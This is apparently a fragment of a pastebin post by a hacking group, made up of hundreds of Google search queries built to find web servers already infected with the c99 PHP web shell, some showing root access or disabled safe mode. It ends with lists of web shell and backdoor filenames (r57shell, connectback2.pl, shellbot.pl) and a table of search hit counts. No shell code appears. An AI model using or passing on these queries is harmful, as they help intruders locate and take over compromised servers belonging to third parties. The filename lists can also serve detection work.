  1280. inurl:c99.php
  1281. inurl:c99.php
  1282. inurl:c99.php
  1283. inurl:"/c99.php"
  1284. inurl:c99.php
  1285. inurl:"/c99.php"
  1286. inurl:"c99.php"
  1287. inurl:"c99.php"
  1288. inurl:"c99.php"
  1289. inurl:c99.php
  1290. inurl:c99.php
  1291. allinurl:c99.php
  1292. inurl:c99.php
  1293. inurl:c99.php
  1294. c99shell v. 1.0 pre-release build #5
  1295. inurl:c99.php
  1296. inurl:c99.php
  1297. c99.php v.
  1298. C99Shell
  1299. inurl:c99.php
  1300. inurl:c99.php
  1301. c99shell
  1302. c99shell
  1303. c99shell
  1304. allinurl:"c99.php"
  1305. "inurl:C99.php"
  1306. inurl:"c99.php"
  1307. inurl:"c99.php"
  1308. "inurl:c99.php" + "intext:safe"
  1309. inurl:c99.php
  1310. allinurl:c99.php
  1311. ext:php inurl:c99.php
  1312. inurl:"c99.php"
  1313. "inurl:/c99.php
  1314. --[ c99shell v. 1.0 pre-release build #12 powered by Captain Crunch Security Team
  1315. inurl:/c99.php
  1316. inurl:/c99.php
  1317. C99Shell v. 1.0 pre-release build #12
  1318. C99Shell v. 1.0 pre-release build #12
  1319. inurl:c99.php
  1320. inurl:c99.php?
  1321. c99.php
  1322. inurl:"/c99.php"
  1323. inurl:"/c99.php"
  1324. c99.php download
  1325. inurl:c99.php
  1326. inurl:c99.php
  1327. inurl:c99.php
  1328. (intitle:r57shell | intitle:c99shell) +uname
  1329. (intitle:r57shell | intitle:c99shell) +uname
  1330. allinurl:c99.php
  1331. "c99shell"
  1332. inurl:minimail c99
  1333. inurl:minimail c99
  1334. inurl:c99.php
  1335. !C99Shell v. 1.0 pre-release build # +php -htm -html -shtml
  1336. allintitle: c99shell filetype:php
  1337. inurl:/c99.php
  1338. inurl:c99.php
  1339. inurl:c99.php
  1340. inurl:c99.php
  1341. intitle:c99shell inurl:c99.php
  1342. inurl:c99.php uid=0(root)
  1343. inurl:c99.php
  1344. inurl:c99.php
  1345. inurl:c99.php uid=0(root)
  1346. inurl:c99.php
  1347. inurl:/files/c99.php
  1348. inurl:c99.php
  1349. inurl:"c99.php"
  1350. inurl:c99.php site:.fr
  1351. inurl:/files/c99.php
  1352. allinurl:c99.php
  1353. inurl:./c99.php
  1354. intitle:c99shell safe-mode:OFF
  1355. inurl:c99.php
  1356. c99.php "uid=0"
  1357. c99.php "uid=0"
  1358. c99.php "uid=0"
  1359. c99.php "uid=0"
  1360. inurl:c99.php
  1361. inurl:c99.php
  1362. powered by Captain Crunch Security Team
  1363. inurl:c99 filetype:php minimail
  1364. allinurl:c99.php
  1365. safe-mode: off (not secure) drwxrwxrwx c99shell
  1366. inurl:c99.php
  1367. inurl:c99.php uid=0(root)
  1368. root c99.php
  1369. "Captain Crunch Security Team" inurl:c99
  1370. download c99.php
  1371. download c99.php
  1372. download c99.php
  1373. inurl:c99.php
  1374. inurl:c99.php
  1375. allinurl: c99.php
  1376. inurl:c99.php
  1377. allinurl: c99.php
  1378. inurl:"/c99.php"
  1379. allinurl: c99.php
  1380. inurl:c99.php
  1381. inurl:"c99.php" c99shell
  1382. inurl:c99.php uid=0(root)
  1383. c99shell powered by admin
  1384. c99shell powered by admin
  1385. inurl:"/c99.php"
  1386. inurl:c99.php
  1387. inurl:c99.php
  1388. inurl:c99.php
  1389. c99 shell v.1.0 (roots)
  1390. inurl:c99.php
  1391. allintitle: "c99shell"
  1392. inurl:"c99.php
  1393. inurl:"c99.php
  1394. allinurl: "c99.php"
  1395. inurl:c99.php
  1396. intitle:C99Shell v. 1.0 pre-release +uname
  1397. intitle:C99Shell v. 1.0 pre-release +uname
  1398. allinurl: "c99.php"
  1399. inurl:c99.php
  1400. inurl:"c99.php"
  1401. inurl:"c99.php"
  1402. inurl:c99.php
  1403. inurl:c99.php
  1404. inurl:c99.php
  1405. inurl:c99.php
  1406. inurl:"c99.php" c99shell
  1407. inurl:c99.php
  1408. inurl:"c99.php"
  1409. allinurl:c99.php
  1410. inurl:"/c99.php
  1411. inurl:c99.php?
  1412. inurl:/c99.php+uname
  1413. allinurl:"c99.php"
  1414. allinurl:c99.php
  1415. inurl:"c99.php"
  1416. inurl:"c99.php"
  1417. allinurl:c99.php
  1418. allinurl:c99.php?
  1419. allinurl:c99.php?
  1420. allinurl:c99.php?
  1421. "inurl:c99..php"
  1422. allinurl:c99.php
  1423. c99shell [file on secure ok ]?
  1424. inurl:c99.php
  1425. inurl:c99.php
  1426. inurl:c99.php
  1427. inurl:c99.php
  1428. inurl:c99.php
  1429. inurl:c99.php
  1430. inurl:c99.php
  1431. inurl:c99.php
  1432. powered by Captain Crunch Security Team
  1433. allinurl:c99.php
  1434. "c99.php" filetype:php
  1435. allinurl:c99.php
  1436. inurl:c99.php
  1437. allinurl:.c99.php
  1438. "inurl:c99.php"
  1439. c99. PHP-code Feedback Self remove
  1440. allinurl:c99.php
  1441. download c99.php
  1442. allinurl:c99.php
  1443. inurl:c99.php
  1444. allinurl: "c99.php"
  1445. allinurl:c99.php
  1446. allinurl:c99.php
  1447. c99shell
  1448. inurl:c99.php
  1449. inurl:c99.php
  1450. intitle:C99Shell v. 1.0 pre-release +uname
  1451. allinurl:"c99.php"
  1452. inurl:c99.php
  1453. inurl:c99.php
  1454. inurl:c99.php
  1455. inurl:c99.php
  1456. safe-mode: off (not secure) drwxrwxrwx c99shell
  1457. inurl:/c99.php
  1458. inurl:"c99.php"
  1459. inurl:c99.php
  1460. inurl:c99.php
  1461. c99.php download
  1462. inurl:c99.php
  1463. inurl:"c99.php"
  1464. inurl:/c99.php
  1465. inurl:"c99.php?"
  1466. inurl:c99.php
  1467. inurl:c99.php
  1468. files/c99.php
  1469. c99shell filetype:php -echo
  1470. c99shell powered by admin
  1471. inurl:c99.php
  1472. inurl:c99.php
  1473. inurl:"c99.php"
  1474. inurl:c99.php uid=0(root)
  1475. allinurl:c99.php
  1476. inurl:"c99.php"
  1477. inurl:"c99.php"
  1478. inurl:"/c99.php" intitle:"C99shell"
  1479. inurl:"/c99.php" intitle:"C99shell"
  1480. inurl:"/c99.php" intitle:"C99shell"
  1481. C99Shell v. 1.0 pre-release build #5
  1482. inurl:c99.php
  1483. inurl:c99.php
  1484. --[ c99shell v. 1.0 pre-release build #16
  1485. c99shell linux infong
  1486. c99shell linux infong
  1487. C99Shell v. 1.0 pre-release build
  1488. !C99Shell v. 1.0 beta!
  1489. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1490. !c99shell v. 1+Safe-mode: OFF (not secure)
  1491. "C99Shell v. 1.0 pre-release build "
  1492. intitle:c99shell +filetype:php
  1493. inurl:c99.php
  1494. intitle:C99Shell v. 1.0 pre-release +uname
  1495. "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1496. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1497. intitle:!C99Shell v. 1.0 pre-release build #16! root
  1498. !C99Shell v. 1.0 pre-release build #5!
  1499. inurl:"c99.php"
  1500. C99Shell v. 1.0 pre-release build #16!
  1501. c99shell v. 1.0 pre-release build #16
  1502. intitle:c99shell intext:uname
  1503. allintext:C99Shell v. 1.0 pre-release build #12
  1504. c99shell v. 1.0 pre-release build #16
  1505. --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  1506. allinurl: "c99.php"
  1507. allinurl: "c99.php"
  1508. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1509. "c99shell v 1.0"
  1510. ftp apache inurl:c99.php
  1511. c99shell+v.+1.0 16
  1512. C99Shell v. 1.0 pre-release build #16 download
  1513. intitle:c99shell "Software: Apache"
  1514. allinurl: c99.php
  1515. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1516. powered by Captain Crunch Security Team
  1517. powered by Captain Crunch Security Team
  1518. !C99Shell v. 1.0 pre-release build #5!
  1519. c99shell v. 1.0 release security
  1520. c99shell v. 1.0 pre-release build
  1521. inurl:c99.php
  1522. c99shell [file on secure ok ]?
  1523. C99Shell v. 1.3
  1524. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1525. inurl:c99.php uid=0(root)
  1526. powered by Captain Crunch Security Team
  1527. C99Shell v. 1.0 pre-release build #16
  1528. c99shell[on file]ok
  1529. c99shell[file on ]ok
  1530. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1531. inurl:c99.php
  1532. "C99Shell v. 1.0 pre"
  1533. =C99Shell v. 1.0 pre-release
  1534. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1535. c99shell v. pre-release build
  1536. inurl:c99.php c99 shell
  1537. inurl:c99.php c99 shell
  1538. powered by Captain Crunch Security Team
  1539. inurl:c99.php
  1540. inurl:c99.php
  1541. !C99Shell v. 1.0 pre-release build #5!
  1542. intitle:"c99shell" filetype:php root
  1543. intitle:"c99shell" Linux infong 2.4
  1544. C99Shell v. 1.0 beta !
  1545. C99Shell v. 1.0 pre-release build #
  1546. inurl:"c99.php"
  1547. allintext:C99Shell v. 1.0 pre-release build #12
  1548. "C99Shell v. 1.0 pre"
  1549. powered by Captain Crunch Security Team
  1550. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1551. inurl:/c99.php?
  1552. allinurl:c99.php
  1553. intitle:C99Shell pre-release
  1554. inurl:"c99.php"
  1555. powered by Captain Crunch Security Team
  1556. inurl:c99.php
  1557. C99Shell v. 1.0 pre-release build #16!
  1558. allinurl:c99.php
  1559. C99Shell v. 1.0 pre-release build #16 administrator
  1560. intitle:c99shell filetype:php
  1561. powered by Captain Crunch Security Team
  1562. powered by Captain Crunch Security Team
  1563. C99Shell v. 1.0 pre-release build #12
  1564. c99shell v.1.0
  1565. allinurl:c99.php
  1566. "c99shell v. 1.0 pre-release build"
  1567. inurl:"c99.php" filetype:php
  1568. "c99shell v. 1.0 "
  1569. ok c99.php
  1570. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1571. c99shell v. 1.0 pre-release build #16 |
  1572. !C99Shell v. 1.0 pre-release build #5!
  1573. !C99Shell v. 1.0 pre-release build #5!
  1574. allinurl:/c99.php
  1575. powered by Captain Crunch Security Team
  1576. inurl:c99.php
  1577. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1578. inurl:c99.php
  1579. powered by Captain Crunch Security Team
  1580. inurl:c99.php
  1581. C99Shell v. 1.0 pre-release
  1582. inurl:c99.php
  1583. inurl:c99.php ext:php
  1584. inurl:"c99.php"
  1585. allinurl:"c99.php"
  1586. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1587. powered by Captain Crunch Security Team
  1588. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1589. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  1590. C99Shell v. 1.0 pre-release build #16 software apache
  1591. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1592. "c99shell v 1.0"
  1593. inurl:"c99.php"
  1594. allintitle: C99shell filetype:php
  1595. C99Shell v. 1.0 pre-release build #16!
  1596. "c99shell v. 1.0 pre-release"
  1597. c99shell v. 1.0 pre-release build #5
  1598. allinurl:"c99.php" filetype:php
  1599. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1600. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1601. !C99Shell v. 1.0 pre-release build #16!
  1602. inurl:c99.php
  1603. intitle:C99Shell v. 1.0 pre-release +uname
  1604. inurl:c99.php
  1605. c99shell v. 1.0
  1606. allinurl: c99.php
  1607. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1608. inurl:"/c99.php"
  1609. c99shell +uname
  1610. c99shell php + uname
  1611. c99shell php + uname
  1612. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1613. allinurl:c99.php
  1614. !C99Shell v. 1.0 pre-release build #5!
  1615. C99Shell v.1.0 pre-release
  1616. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1617. inurl:c99.php
  1618. intitle:c99shell filetype:php
  1619. "Encoder Tools Proc. FTP brute"
  1620. "c99" filetype:php intext:"Safe-Mode: OFF"
  1621. c99shell v. 1.0 pre
  1622. inurl:c99.php
  1623. intitle:c99shell uname -bbpress
  1624.  
  1625.  
  1626. ==============================================================
  1627.  
  1628.  
  1629.  
  1630. - C99madShell v. 2.0 madnet edition
  1631. - c99-safe-mode
  1632. - c99edit
  1633. - c99shell
  1634. - DownloaderToFTP
  1635. - GFS Web-Shell ver 4.0.0.0
  1636. - NetworkFileManager
  1637. - NiX Remote Web Shell&#8482;
  1638. - r57MySQL_FileViewer
  1639. - r57shell
  1640. - MySQLBackUpAll
  1641. - MySQLBackUpOnce
  1642. - Sql
  1643. - a_gedit
  1644. - Antichat
  1645. - bk
  1646. - c2007
  1647. - Casus15
  1648. - CmdAsp
  1649. - Csh
  1650. - Ctt_sh
  1651. - Cybershell
  1652. - DxShell
  1653. - gfs_sh
  1654. - grp-2018
  1655. - Hidshell
  1656. - iMHaPFtp
  1657. - Load_shell
  1658. - NFM
  1659. - NGH
  1660. - Nixrem
  1661. - NST
  1662. - Phvayvv
  1663. - Predator
  1664. - r0t
  1665. - Remview
  1666. - Zacosmall
  1667. - Rashell v.1.31
  1668. - Xoce 1.5
  1669. - Xoce 1.7
  1670. - img
  1671. - mailer3
  1672. - myshell
  1673. - mysql_tool
  1674. - network
  1675. - nshell
  1676. - ru24_post_sh
  1677. - pHpINJ
  1678. - PHP Shell
  1679. - Pws
  1680. - KA_uShell
  1681. - Sincap
  1682. - telnet
  1683. - telnetd
  1684. - smtpd.py
  1685. - xinfo
  1686. - CyberSpy5.Asp
  1687. - Indexer.asp
  1688. - Klasvayv.asp
  1689. - NTdaddy.asp
  1690. - Reader.asp
  1691. - RemExp.asp
  1692. - Zehir4.asp
  1693. - Ajan.asp
  1694. - EFSO_2.asp
  1695. - Elmali Seker.asp
  1696. - Server Variables.asp
  1697. - Tool.asp
  1698. - WebShell.pl
  1699. - PHP Backdoor Connect.pl
  1700. - perlbot.pl
  1701. - shellbot.pl
  1702. - r57pws.pl
  1703. - lurm_safemod_on.pl
  1704. - Asmodeus v0.1.pl
  1705. - connectback2.pl
  1706. - Java Shell.js
  1707. - Phyton Shell.py
  1708. - cgi-python.py
  1709.  
  1710. [ &#1057;
  1711.  
  1712. ==============================================================
  1713.  
  1714. Ajan.asp
  1715. Asmodeus v0.1.pl
  1716. backup.php
  1717. backupsql.php
  1718. Blind Shell.cpp
  1719. c2007.php
  1720. c99.php
  1721. c99shell.php
  1722. Casus15.php
  1723. cgi-python.py
  1724. CMD.asp
  1725. CmdAsp.asp
  1726. connectback2.pl
  1727. ctt_sh.php
  1728. CyberEye.asp
  1729. cybershell.php
  1730. CyberSpy5.Asp
  1731. Dx.php
  1732. DxShell_hk.php
  1733. EFSO_2.asp
  1734. Elmali Seker.asp
  1735. elmaliseker.asp
  1736. gfs_sh.php
  1737. img.php
  1738. iMHaPFtp.php
  1739. Inderxer.asp
  1740. indexer.asp
  1741. Java Shell.js
  1742. Klasvayv.asp
  1743. load_shell.php
  1744. lurm_safemod_on.cgi
  1745. mailer3.php
  1746. myshell.php
  1747. mysql.php
  1748. mysql_tool.php
  1749. network.php
  1750. Nshell (1).php
  1751. nshell.php
  1752. nstview.php
  1753. NT Addy.asp
  1754. ntdaddy.asp
  1755. perlbot.pl
  1756. PH Vayv.php
  1757. PHP Backdoor Connect.pl
  1758. PHP Shell.php
  1759. pHpINJ.php
  1760. phpshell.php
  1761. phvayv.php
  1762. Phyton Shell.py
  1763. pws.php
  1764. r57 Shell.php
  1765. r57pws.pl
  1766. r57shell.php
  1767. Rader.asp
  1768. reader.asp
  1769. Rem Exp.asp
  1770. Rem View.php
  1771. RemExp.asp
  1772. remview.php
  1773. ru24_post_sh.php
  1774. Russian.php
  1775. s.php
  1776. Server Variables.asp
  1777. shell.php
  1778. shellbot.pl
  1779. Sincap.php
  1780. smtpd.py
  1781. telnet.cgi
  1782. telnet.pl
  1783. telnetd.pl
  1784. Test.php
  1785. Tool.asp
  1786. Uploader.php
  1787. WebShell.cgi
  1788. xinfo.php
  1789. zacosmall.php
  1790. Zehir 4.asp
  1791. zehir4.asp
  1792.  
  1793. ==============================================================
  1794.  
  1795.        Hits      Search String
  1796. ----------------  ----------------------
  1797.  
  1798. 33        28.45%  powered by captain crunch security team
  1799. 6          5.17%  safe-mode: off (not secure)
  1800. 5          4.31%  home
  1801. 4          3.45%  basel 2.2
  1802. 4          3.45%  safe-mode: off (not secure) drwxrwxrwx
  1803. 3          2.59%  c99memoryl
  1804. 3          2.59%  c99shell [file on secure ok ]
  1805. 3          2.59%  c99shell v. 1.0 pre-release build #16
  1806. 3          2.59%  hacker
  1807. 3          2.59%  uid=99(nobody) gid=99(nobody) groups=99(nobody)
  1808. 2          1.72%  --[ c99shell v. 1.0 pre-release build #16
  1809. 2          1.72%  basel
  1810. 2          1.72%  c99shell v. 1.0 pre-release build
  1811. 2          1.72%  powered by captain crunch security team | http://ccteam.ru |
  1812. 2          1.72%  safe-mode : off ( not secured ) drwxrwxrwx
  1813. 2          1.72%  safe-mode: off (not secure) drwxrwxrwx c99shell
  1814. 1          0.86%  !c99shell v. 1.0 pre-release build #16!
  1815. 1          0.86%  --[ c99shell v. 1.0 pre-release build
  1816. 1          0.86%  -[ c99shell v. 1.0 pre-release build #16 powered by captain cru
  1817. 1          0.86%  /opt/zope/lib/python/zdaemon/zdrun.py
  1818. 1          0.86%  allintext:â&#8364;&#65533;safe-mode: off (not secure)â&#8364;&#65533;
  1819. 1          0.86%  allinurl:selfremove
  1820. 1          0.86%  basel documentation
  1821. 1          0.86%  c99memory.php
  1822. 1          0.86%  c99shell safe-mode : off ( not secured ) drwxrwxrwx
  1823. 1          0.86%  c99shell v. 1.0 pre-release build #16 powered by captain crunch
  1824. 1          0.86%  c99shell v. 1.0 pre-release uname
  1825. 1          0.86%  c99shell v. pre-release build
  1826. 1          0.86%  captain crunch security team
  1827. 1          0.86%  code safe-mode: off (not secure) drwxrwxrwx c99shell
  1828. 1          0.86%  drwxrwxrwx c99shell filetype:php
  1829. 1          0.86%  encoder bind proc. ftp brute sec. sql php-code feedback self re
  1830. 1          0.86%  encoder tools proc. ftp brute sec. sql php-code update feedback
  1831. 1          0.86%  home updir search buffer tools proc ftp brute sec sql self remo
  1832. 1          0.86%  how to restore using !c99memory v. 1.0 pre-release build #16!
  1833. 1          0.86%  intext:c99memory v. 1.0
  1834. 1          0.86%  intext:safe-mode: off (not secure)
  1835. 1          0.86%  intext:safe-mode: off (not secure) tooling
  1836. 1          0.86%  inurl:act=sql
  1837. 1          0.86%  name asc. size · modify · owner/group · perms action
  1838. 1          0.86%  php safe-mode drwxrwxrwx
  1839. 1          0.86%  php4 timezone database
  1840. 1          0.86%  powered by captain crunch security team drwxrwxrwx
  1841. 1          0.86%  powered by captain crunch security team | http://ccteam.ru
  1842. 1          0.86%  safe mode: off ( not secure )
  1843. 1          0.86%  safe mode: off (not secure)
  1844. 1          0.86%  safe-mode: off (not secure) / tmp/ drwxrwxrwx
  1845. 1          0.86%  safe-mode: off (not secure) site:pt
  1846. 1          0.86%  shell powered by captain crunch security team
  1847. 1          0.86%  site:www.astro.mat.uc.pt basel
  1848. 1          0.86%  uid= gid= groups= sql uname -a
  1849. 1          0.86%  uid=99 ( nobody ) gid=99 ( nobody )
  1850. 1          0.86%  uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off (
  1851.  
  1852. now finish     "bbbbbbb bay"     good lock          www.saudihack.com
  1853.  
  1854.                     p o w e r  b y      ,,,,,...maxhex,,,,,...

Submit a correction or amendment below (click here to make a fresh posting)
After submitting an amendment, you'll be able to view the differences between the old and new posts easily.

Syntax highlighting:

To highlight particular lines, prefix each line with @@


Remember me so that I can delete my post